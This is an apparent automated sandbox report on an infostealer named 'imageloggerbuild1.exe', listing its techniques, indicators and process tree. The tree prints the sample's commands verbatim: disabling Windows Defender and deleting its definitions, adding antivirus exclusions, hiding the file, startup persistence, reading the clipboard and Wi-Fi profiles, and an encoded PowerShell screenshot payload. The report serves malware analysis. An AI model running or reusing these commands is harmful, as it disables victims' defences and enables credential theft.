89413cecfc4b40f063be4bcdc56f9b61bbf9688ede87cf41105d5f166d66e68b

Analysis

max time kernel
94s
max time network
141s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17/12/2024, 00:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

imageloggerbuild1.exe
Size

7.6MB
MD5

ce786c4ea9ff7bc2876421360cb2fca9
SHA1

072e7e01cb1ae48315e5f607b95821ae006dfe4b
SHA256

89413cecfc4b40f063be4bcdc56f9b61bbf9688ede87cf41105d5f166d66e68b
SHA512

f6d2b58296070bdd54582fb779349e82bf28ea12b261cf12045a3876912c0779420428b513885bb4c4954ae2af68c3e71919bc0c7877f9cbc7346307ae68f66f
SSDEEP

196608:MmHYawfI9jUCzi4H1qSiXLGVi7DMgpZ3Q0VMwICEc/j9:IIHziK1piXLGVE4Ue0VJp

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1836	powershell.exe
324	powershell.exe
2136	powershell.exe
2032	powershell.exe
2736	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	imageloggerbuild1.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4360	cmd.exe
4676	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4236	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3664	imageloggerbuild1.exe
3664	imageloggerbuild1.exe
3664	imageloggerbuild1.exe
3664	imageloggerbuild1.exe
3664	imageloggerbuild1.exe
3664	imageloggerbuild1.exe
3664	imageloggerbuild1.exe
3664	imageloggerbuild1.exe
3664	imageloggerbuild1.exe
3664	imageloggerbuild1.exe
3664	imageloggerbuild1.exe
3664	imageloggerbuild1.exe
3664	imageloggerbuild1.exe
3664	imageloggerbuild1.exe
3664	imageloggerbuild1.exe
3664	imageloggerbuild1.exe
3664	imageloggerbuild1.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
24	discord.com
25	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
22	ip-api.com
14	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
3428	tasklist.exe
1976	tasklist.exe
4020	tasklist.exe
5084	tasklist.exe
1896	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1692	cmd.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023ba5-21.dat	upx
behavioral2/memory/3664-25-0x00007FFF159C0000-0x00007FFF16023000-memory.dmp	upx
behavioral2/files/0x000a000000023b98-27.dat	upx
behavioral2/memory/3664-30-0x00007FFF24910000-0x00007FFF24937000-memory.dmp	upx
behavioral2/files/0x000a000000023ba3-31.dat	upx
behavioral2/files/0x000b000000023baa-40.dat	upx
behavioral2/files/0x000a000000023b9f-48.dat	upx
behavioral2/files/0x000a000000023b9e-47.dat	upx
behavioral2/files/0x000a000000023b9d-46.dat	upx
behavioral2/files/0x000a000000023b9c-45.dat	upx
behavioral2/files/0x000a000000023b9b-44.dat	upx
behavioral2/files/0x000a000000023b9a-43.dat	upx
behavioral2/files/0x000a000000023b99-42.dat	upx
behavioral2/files/0x000a000000023b97-41.dat	upx
behavioral2/files/0x000b000000023ba9-39.dat	upx
behavioral2/files/0x000a000000023ba4-35.dat	upx
behavioral2/files/0x000a000000023ba8-38.dat	upx
behavioral2/files/0x000a000000023ba2-34.dat	upx
behavioral2/memory/3664-32-0x00007FFF2E310000-0x00007FFF2E31F000-memory.dmp	upx
behavioral2/memory/3664-54-0x00007FFF242B0000-0x00007FFF242DB000-memory.dmp	upx
behavioral2/memory/3664-56-0x00007FFF24290000-0x00007FFF242A9000-memory.dmp	upx
behavioral2/memory/3664-58-0x00007FFF23C40000-0x00007FFF23C65000-memory.dmp	upx
behavioral2/memory/3664-60-0x00007FFF15350000-0x00007FFF154CF000-memory.dmp	upx
behavioral2/memory/3664-62-0x00007FFF2AB40000-0x00007FFF2AB59000-memory.dmp	upx
behavioral2/memory/3664-64-0x00007FFF28520000-0x00007FFF2852D000-memory.dmp	upx
behavioral2/memory/3664-66-0x00007FFF24520000-0x00007FFF24554000-memory.dmp	upx
behavioral2/memory/3664-74-0x00007FFF14E10000-0x00007FFF15343000-memory.dmp	upx
behavioral2/memory/3664-72-0x00007FFF23E60000-0x00007FFF23F2E000-memory.dmp	upx
behavioral2/memory/3664-71-0x00007FFF24910000-0x00007FFF24937000-memory.dmp	upx
behavioral2/memory/3664-70-0x00007FFF159C0000-0x00007FFF16023000-memory.dmp	upx
behavioral2/memory/3664-76-0x00007FFF24090000-0x00007FFF240A4000-memory.dmp	upx
behavioral2/memory/3664-79-0x00007FFF283F0000-0x00007FFF283FD000-memory.dmp	upx
behavioral2/memory/3664-78-0x00007FFF242B0000-0x00007FFF242DB000-memory.dmp	upx
behavioral2/memory/3664-82-0x00007FFF23DA0000-0x00007FFF23E53000-memory.dmp	upx
behavioral2/memory/3664-81-0x00007FFF24290000-0x00007FFF242A9000-memory.dmp	upx
behavioral2/memory/3664-107-0x00007FFF23C40000-0x00007FFF23C65000-memory.dmp	upx
behavioral2/memory/3664-121-0x00007FFF15350000-0x00007FFF154CF000-memory.dmp	upx
behavioral2/memory/3664-214-0x00007FFF2AB40000-0x00007FFF2AB59000-memory.dmp	upx
behavioral2/memory/3664-299-0x00007FFF24520000-0x00007FFF24554000-memory.dmp	upx
behavioral2/memory/3664-301-0x00007FFF23E60000-0x00007FFF23F2E000-memory.dmp	upx
behavioral2/memory/3664-318-0x00007FFF14E10000-0x00007FFF15343000-memory.dmp	upx
behavioral2/memory/3664-328-0x00007FFF24090000-0x00007FFF240A4000-memory.dmp	upx
behavioral2/memory/3664-346-0x00007FFF15350000-0x00007FFF154CF000-memory.dmp	upx
behavioral2/memory/3664-340-0x00007FFF159C0000-0x00007FFF16023000-memory.dmp	upx
behavioral2/memory/3664-369-0x00007FFF23DA0000-0x00007FFF23E53000-memory.dmp	upx
behavioral2/memory/3664-378-0x00007FFF28520000-0x00007FFF2852D000-memory.dmp	upx
behavioral2/memory/3664-380-0x00007FFF23E60000-0x00007FFF23F2E000-memory.dmp	upx
behavioral2/memory/3664-379-0x00007FFF24520000-0x00007FFF24554000-memory.dmp	upx
behavioral2/memory/3664-377-0x00007FFF2AB40000-0x00007FFF2AB59000-memory.dmp	upx
behavioral2/memory/3664-376-0x00007FFF15350000-0x00007FFF154CF000-memory.dmp	upx
behavioral2/memory/3664-375-0x00007FFF23C40000-0x00007FFF23C65000-memory.dmp	upx
behavioral2/memory/3664-374-0x00007FFF24290000-0x00007FFF242A9000-memory.dmp	upx
behavioral2/memory/3664-373-0x00007FFF242B0000-0x00007FFF242DB000-memory.dmp	upx
behavioral2/memory/3664-372-0x00007FFF24910000-0x00007FFF24937000-memory.dmp	upx
behavioral2/memory/3664-371-0x00007FFF2E310000-0x00007FFF2E31F000-memory.dmp	upx
behavioral2/memory/3664-370-0x00007FFF14E10000-0x00007FFF15343000-memory.dmp	upx
behavioral2/memory/3664-355-0x00007FFF159C0000-0x00007FFF16023000-memory.dmp	upx
behavioral2/memory/3664-368-0x00007FFF283F0000-0x00007FFF283FD000-memory.dmp	upx
behavioral2/memory/3664-367-0x00007FFF24090000-0x00007FFF240A4000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
324	cmd.exe
1108	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2464	cmd.exe
4276	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4084	WMIC.exe
4856	WMIC.exe
3972	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1648	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1108	PING.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
2032	powershell.exe
1836	powershell.exe
1836	powershell.exe
2032	powershell.exe
2736	powershell.exe
2736	powershell.exe
4676	powershell.exe
4676	powershell.exe
4676	powershell.exe
2072	powershell.exe
2072	powershell.exe
2072	powershell.exe
324	powershell.exe
324	powershell.exe
4292	powershell.exe
4292	powershell.exe
2136	powershell.exe
2136	powershell.exe
316	powershell.exe
316	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1896	tasklist.exe
Token: SeDebugPrivilege	2032	powershell.exe
Token: SeDebugPrivilege	1836	powershell.exe
Token: SeIncreaseQuotaPrivilege	1648	WMIC.exe
Token: SeSecurityPrivilege	1648	WMIC.exe
Token: SeTakeOwnershipPrivilege	1648	WMIC.exe
Token: SeLoadDriverPrivilege	1648	WMIC.exe
Token: SeSystemProfilePrivilege	1648	WMIC.exe
Token: SeSystemtimePrivilege	1648	WMIC.exe
Token: SeProfSingleProcessPrivilege	1648	WMIC.exe
Token: SeIncBasePriorityPrivilege	1648	WMIC.exe
Token: SeCreatePagefilePrivilege	1648	WMIC.exe
Token: SeBackupPrivilege	1648	WMIC.exe
Token: SeRestorePrivilege	1648	WMIC.exe
Token: SeShutdownPrivilege	1648	WMIC.exe
Token: SeDebugPrivilege	1648	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1648	WMIC.exe
Token: SeRemoteShutdownPrivilege	1648	WMIC.exe
Token: SeUndockPrivilege	1648	WMIC.exe
Token: SeManageVolumePrivilege	1648	WMIC.exe
Token: 33	1648	WMIC.exe
Token: 34	1648	WMIC.exe
Token: 35	1648	WMIC.exe
Token: 36	1648	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1648	WMIC.exe
Token: SeSecurityPrivilege	1648	WMIC.exe
Token: SeTakeOwnershipPrivilege	1648	WMIC.exe
Token: SeLoadDriverPrivilege	1648	WMIC.exe
Token: SeSystemProfilePrivilege	1648	WMIC.exe
Token: SeSystemtimePrivilege	1648	WMIC.exe
Token: SeProfSingleProcessPrivilege	1648	WMIC.exe
Token: SeIncBasePriorityPrivilege	1648	WMIC.exe
Token: SeCreatePagefilePrivilege	1648	WMIC.exe
Token: SeBackupPrivilege	1648	WMIC.exe
Token: SeRestorePrivilege	1648	WMIC.exe
Token: SeShutdownPrivilege	1648	WMIC.exe
Token: SeDebugPrivilege	1648	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1648	WMIC.exe
Token: SeRemoteShutdownPrivilege	1648	WMIC.exe
Token: SeUndockPrivilege	1648	WMIC.exe
Token: SeManageVolumePrivilege	1648	WMIC.exe
Token: 33	1648	WMIC.exe
Token: 34	1648	WMIC.exe
Token: 35	1648	WMIC.exe
Token: 36	1648	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4084	WMIC.exe
Token: SeSecurityPrivilege	4084	WMIC.exe
Token: SeTakeOwnershipPrivilege	4084	WMIC.exe
Token: SeLoadDriverPrivilege	4084	WMIC.exe
Token: SeSystemProfilePrivilege	4084	WMIC.exe
Token: SeSystemtimePrivilege	4084	WMIC.exe
Token: SeProfSingleProcessPrivilege	4084	WMIC.exe
Token: SeIncBasePriorityPrivilege	4084	WMIC.exe
Token: SeCreatePagefilePrivilege	4084	WMIC.exe
Token: SeBackupPrivilege	4084	WMIC.exe
Token: SeRestorePrivilege	4084	WMIC.exe
Token: SeShutdownPrivilege	4084	WMIC.exe
Token: SeDebugPrivilege	4084	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4084	WMIC.exe
Token: SeRemoteShutdownPrivilege	4084	WMIC.exe
Token: SeUndockPrivilege	4084	WMIC.exe
Token: SeManageVolumePrivilege	4084	WMIC.exe
Token: 33	4084	WMIC.exe
Token: 34	4084	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2000 wrote to memory of 3664	2000	imageloggerbuild1.exe	82
PID 2000 wrote to memory of 3664	2000	imageloggerbuild1.exe	82
PID 3664 wrote to memory of 1084	3664	imageloggerbuild1.exe	83
PID 3664 wrote to memory of 1084	3664	imageloggerbuild1.exe	83
PID 3664 wrote to memory of 1984	3664	imageloggerbuild1.exe	84
PID 3664 wrote to memory of 1984	3664	imageloggerbuild1.exe	84
PID 3664 wrote to memory of 4636	3664	imageloggerbuild1.exe	86
PID 3664 wrote to memory of 4636	3664	imageloggerbuild1.exe	86
PID 1084 wrote to memory of 2032	1084	cmd.exe	89
PID 1084 wrote to memory of 2032	1084	cmd.exe	89
PID 4636 wrote to memory of 1896	4636	cmd.exe	90
PID 4636 wrote to memory of 1896	4636	cmd.exe	90
PID 1984 wrote to memory of 1836	1984	cmd.exe	91
PID 1984 wrote to memory of 1836	1984	cmd.exe	91
PID 3664 wrote to memory of 5036	3664	imageloggerbuild1.exe	93
PID 3664 wrote to memory of 5036	3664	imageloggerbuild1.exe	93
PID 5036 wrote to memory of 1648	5036	cmd.exe	95
PID 5036 wrote to memory of 1648	5036	cmd.exe	95
PID 3664 wrote to memory of 4956	3664	imageloggerbuild1.exe	96
PID 3664 wrote to memory of 4956	3664	imageloggerbuild1.exe	96
PID 4956 wrote to memory of 1804	4956	cmd.exe	98
PID 4956 wrote to memory of 1804	4956	cmd.exe	98
PID 3664 wrote to memory of 720	3664	imageloggerbuild1.exe	99
PID 3664 wrote to memory of 720	3664	imageloggerbuild1.exe	99
PID 720 wrote to memory of 4596	720	cmd.exe	101
PID 720 wrote to memory of 4596	720	cmd.exe	101
PID 3664 wrote to memory of 728	3664	imageloggerbuild1.exe	102
PID 3664 wrote to memory of 728	3664	imageloggerbuild1.exe	102
PID 728 wrote to memory of 4084	728	cmd.exe	104
PID 728 wrote to memory of 4084	728	cmd.exe	104
PID 3664 wrote to memory of 4520	3664	imageloggerbuild1.exe	105
PID 3664 wrote to memory of 4520	3664	imageloggerbuild1.exe	105
PID 4520 wrote to memory of 4856	4520	cmd.exe	107
PID 4520 wrote to memory of 4856	4520	cmd.exe	107
PID 3664 wrote to memory of 1692	3664	imageloggerbuild1.exe	108
PID 3664 wrote to memory of 1692	3664	imageloggerbuild1.exe	108
PID 3664 wrote to memory of 1728	3664	imageloggerbuild1.exe	110
PID 3664 wrote to memory of 1728	3664	imageloggerbuild1.exe	110
PID 1692 wrote to memory of 1864	1692	cmd.exe	112
PID 1692 wrote to memory of 1864	1692	cmd.exe	112
PID 1728 wrote to memory of 2736	1728	cmd.exe	113
PID 1728 wrote to memory of 2736	1728	cmd.exe	113
PID 3664 wrote to memory of 548	3664	imageloggerbuild1.exe	114
PID 3664 wrote to memory of 548	3664	imageloggerbuild1.exe	114
PID 3664 wrote to memory of 2380	3664	imageloggerbuild1.exe	115
PID 3664 wrote to memory of 2380	3664	imageloggerbuild1.exe	115
PID 548 wrote to memory of 3428	548	cmd.exe	118
PID 548 wrote to memory of 3428	548	cmd.exe	118
PID 2380 wrote to memory of 1976	2380	cmd.exe	119
PID 2380 wrote to memory of 1976	2380	cmd.exe	119
PID 3664 wrote to memory of 1612	3664	imageloggerbuild1.exe	120
PID 3664 wrote to memory of 1612	3664	imageloggerbuild1.exe	120
PID 3664 wrote to memory of 4360	3664	imageloggerbuild1.exe	121
PID 3664 wrote to memory of 4360	3664	imageloggerbuild1.exe	121
PID 3664 wrote to memory of 1044	3664	imageloggerbuild1.exe	124
PID 3664 wrote to memory of 1044	3664	imageloggerbuild1.exe	124
PID 3664 wrote to memory of 5096	3664	imageloggerbuild1.exe	125
PID 3664 wrote to memory of 5096	3664	imageloggerbuild1.exe	125
PID 1612 wrote to memory of 4460	1612	cmd.exe	128
PID 1612 wrote to memory of 4460	1612	cmd.exe	128
PID 4360 wrote to memory of 4676	4360	cmd.exe	129
PID 4360 wrote to memory of 4676	4360	cmd.exe	129
PID 5096 wrote to memory of 1440	5096	cmd.exe	130
PID 5096 wrote to memory of 1440	5096	cmd.exe	130

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2944	attrib.exe
4688	attrib.exe
1864	attrib.exe

C:\Users\Admin\AppData\Local\Temp\imageloggerbuild1.exe
"C:\Users\Admin\AppData\Local\Temp\imageloggerbuild1.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2000
- C:\Users\Admin\AppData\Local\Temp\imageloggerbuild1.exe
  "C:\Users\Admin\AppData\Local\Temp\imageloggerbuild1.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\imageloggerbuild1.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1084
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\imageloggerbuild1.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1984
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4636
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5036
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4956
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:1804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:720
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:728
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4520
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\imageloggerbuild1.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1692
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\imageloggerbuild1.exe"
      4⤵
      Views/modifies file attributes
      PID:1864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ ‍ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1728
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ ‍ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:548
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2380
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1612
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4360
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1044
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5096
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2464
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:2180
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1192
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgAC